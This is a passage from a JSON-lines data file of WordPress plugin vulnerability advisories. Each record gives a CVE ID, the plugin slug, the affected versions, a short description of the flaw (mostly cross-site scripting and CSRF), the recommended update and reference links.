version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1e6685-44a7-452e-89ab-b9fffb65a12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1e6685-44a7-452e-89ab-b9fffb65a12b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0097","slug":"post-carousel","versionEndExcluding":"2.4.19","description":"The Post Grid, Post Carousel, & List Category Posts WordPress plugin before 2.4.19 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19379f08-d667-4b1e-a774-0f4a17ad7bff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19379f08-d667-4b1e-a774-0f4a17ad7bff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11805","slug":"quick-license-manager","versionImpact":"2.4.17","versionEndExcluding":"2.4.18","description":"The Quick License Manager \u2013 WooCommerce Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'submit_qlm_products' parameter in all versions up to, and including, 2.4.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198437\\\/quick-license-manager\\\/trunk?contextall=1&old=3198391&old_path=%2Fquick-license-manager%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198437\\\/quick-license-manager\\\/trunk?contextall=1&old=3198391&old_path=%2Fquick-license-manager%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c781c8a-1ffb-438b-bf78-9d386fbd16eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c781c8a-1ffb-438b-bf78-9d386fbd16eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5459","slug":"food-and-drink-menu","versionImpact":"2.4.16","versionEndExcluding":"2.4.17","description":"The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to unauthorized creation of data due to a missing capability check on 'add_section', 'add_menu', 'add_menu_item', and 'add_menu_page' functions in all versions up to, and including, 2.4.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create menu sections, menus, food items, and new menu pages.","recommendation":"Update to version 2.4.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03f9d9bb-6a87-4da9-bbb0-65203d7250e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03f9d9bb-6a87-4da9-bbb0-65203d7250e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/food-and-drink-menu\\\/trunk\\\/includes\\\/class-installation-walkthrough.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097599\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097599\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2122","slug":"foogallery","versionImpact":"2.4.15","versionEndExcluding":"2.4.16","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via album gallery custom URLs in all versions up to, and including, 2.4.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69e9802-9087-4cd9-86eb-b64a82bc7c0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69e9802-9087-4cd9-86eb-b64a82bc7c0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3100157%40foogallery&new=3100157%40foogallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3100157%40foogallery&new=3100157%40foogallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4376","slug":"serial-codes-generator-and-validator","versionEndExcluding":"2.4.15","description":"The Serial Codes Generator and Validator with WooCommerce Support WordPress plugin before 2.4.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13910e52-5302-4252-8bee-49dd1f0e180a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13910e52-5302-4252-8bee-49dd1f0e180a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5804","slug":"cf7-conditional-fields","versionImpact":"2.4.13","versionEndExcluding":"2.4.14","description":"The Conditional Fields for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.13. This is due to missing or incorrect nonce validation on the wpcf7cf_admin_init function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c5dc2-3195-47d9-9e44-ca2043748eed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c5dc2-3195-47d9-9e44-ca2043748eed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-conditional-fields\\\/trunk\\\/wpcf7cf-options.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-conditional-fields\\\/trunk\\\/wpcf7cf-options.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121497%40cf7-conditional-fields&new=3121497%40cf7-conditional-fields&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121497%40cf7-conditional-fields&new=3121497%40cf7-conditional-fields&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5340","slug":"food-and-drink-menu","versionImpact":"2.4.10","versionEndExcluding":"2.4.11","description":"The Five Star Restaurant Menu and Food Ordering WordPress plugin before 2.4.11 unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.","recommendation":"Update to version 2.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91a5847a-62e7-4b98-a554-5eecb6a06e5b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91a5847a-62e7-4b98-a554-5eecb6a06e5b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1954","slug":"oliver-pos","versionImpact":"2.4.1.8","versionEndExcluding":"2.4.1.9","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1.8. This is due to missing or incorrect nonce validation in the includes\/class-pos-bridge-install.php file. This makes it possible for unauthenticated attackers to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13441","slug":"bilingual-linker","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Bilingual Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bl_otherlang_link_1 parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bilingual-linker\\\/tags\\\/2.4\\\/bilingual-linker.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bilingual-linker\\\/tags\\\/2.4\\\/bilingual-linker.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daeda8d7-1bff-4258-9953-b4303f1778d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daeda8d7-1bff-4258-9953-b4303f1778d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1399","slug":"menu-ordering-reservations","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Restaurant Menu \u2013 Food Ordering System \u2013 Table Reservation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d419d9e-73c5-4d14-8da0-27a90924e0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d419d9e-73c5-4d14-8da0-27a90924e0b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3064578%40menu-ordering-reservations%2Ftrunk&old=3022834%40menu-ordering-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3064578%40menu-ordering-reservations%2Ftrunk&old=3022834%40menu-ordering-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4793","slug":"blog-designer-for-post-and-widget","versionEndExcluding":"2.4.1","description":"The Blog Designer WordPress plugin before 2.4.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00c34ba8-b82e-4bb9-90b1-1afefae75948\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00c34ba8-b82e-4bb9-90b1-1afefae75948\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8981","slug":"broken-link-checker","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Broken Link Checker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg in \/app\/admin-notices\/features\/class-view.php without appropriate escaping on the URL in all versions up to, and including, 2.4.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/429fe34a-5fa9-4032-9b21-4de114dbc9d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/429fe34a-5fa9-4032-9b21-4de114dbc9d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159860\\\/broken-link-checker\\\/trunk\\\/app\\\/admin-notices\\\/features\\\/class-view.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159860\\\/broken-link-checker\\\/trunk\\\/app\\\/admin-notices\\\/features\\\/class-view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.0\\\/app\\\/admin-notices\\\/features\\\/class-view.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.0\\\/app\\\/admin-notices\\\/features\\\/class-view.php#L43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3469","slug":"gp-premium","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The GP Premium plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a697391-f30d-403f-9046-8fa219a49302?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a697391-f30d-403f-9046-8fa219a49302?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13118","slug":"ip-based-login","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The IP Based Login WordPress plugin before 2.4.1 does not have CSRF checks in some places, which could allow attackers to make logged in users delete all logs via a CSRF attack","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba6f98e-b931-4f02-b190-ca855a674839\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba6f98e-b931-4f02-b190-ca855a674839\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5419","slug":"cf7-widget-elementor","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Void Contact Form 7 Widget For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cf7_redirect_page' attribute within the plugin's Void Contact From 7 widget in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2837c9b2-419e-453a-b011-5ec1ef050d62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2837c9b2-419e-453a-b011-5ec1ef050d62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-widget-elementor\\\/tags\\\/2.4\\\/widgets\\\/void-section-cf7.php#L1672\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-widget-elementor\\\/tags\\\/2.4\\\/widgets\\\/void-section-cf7.php#L1672\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109802\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109802\\\/#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4455","slug":"yith-woocommerce-ajax-search","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018item\u2019 parameter in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0f5fd4-cd06-4d11-9f22-1f417b546afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0f5fd4-cd06-4d11-9f22-1f417b546afb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-woocommerce-ajax-search\\\/trunk\\\/includes\\\/admin\\\/class-yith-wcas-admin-statistic-list-table.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-woocommerce-ajax-search\\\/trunk\\\/includes\\\/admin\\\/class-yith-wcas-admin-statistic-list-table.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091321\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091321\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6231","slug":"request-a-quote","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Request a Quote WordPress plugin before 2.4.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75ad1d8f-edc3-4eb3-b4c0-73832c0a4ca0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75ad1d8f-edc3-4eb3-b4c0-73832c0a4ca0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12800","slug":"ip-based-login","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The IP Based Login WordPress plugin before 2.4.1 does not sanitise values when importing, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f1ceca5-3b7b-4cf0-bccd-03e204e5bfad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f1ceca5-3b7b-4cf0-bccd-03e204e5bfad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7062","slug":"file-manager-advanced-shortcode","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4. This makes it possible for attackers with contributor access or higher to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"name\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36745","slug":"wedevs-project-manager","versionEndExcluding":"2.4.1","description":"The WP Project Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.0. This is due to missing or incorrect nonce validation on the do_updates() function. This makes it possible for unauthenticated attackers to trigger updates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/456c13f5-4a8b-4eea-a2a0-f37f8508551b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/456c13f5-4a8b-4eea-a2a0-f37f8508551b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.4.1\\\/core\\\/Upgrades\\\/Upgrade.php?rev=2368374#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.4.1\\\/core\\\/Upgrades\\\/Upgrade.php?rev=2368374#L179\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11749","slug":"appizy-app-embed","versionImpact":"2.3.2","versionEndExcluding":"2.4.0","description":"The App Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'appizy' shortcode in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216285%40appizy-app-embed&new=3216285%40appizy-app-embed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216285%40appizy-app-embed&new=3216285%40appizy-app-embed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a0507-aa51-4e4e-a582-9007041c811b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a0507-aa51-4e4e-a582-9007041c811b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12854","slug":"garden-gnome-package","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Garden Gnome Package plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the functionality that automatically extracts 'ggpkg' files that have been uploaded in all versions up to, and including, 2.3.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215986%40garden-gnome-package&new=3215986%40garden-gnome-package&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215986%40garden-gnome-package&new=3215986%40garden-gnome-package&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bcfc8f1-e962-4ad7-8a9d-89ce5c9022b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bcfc8f1-e962-4ad7-8a9d-89ce5c9022b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
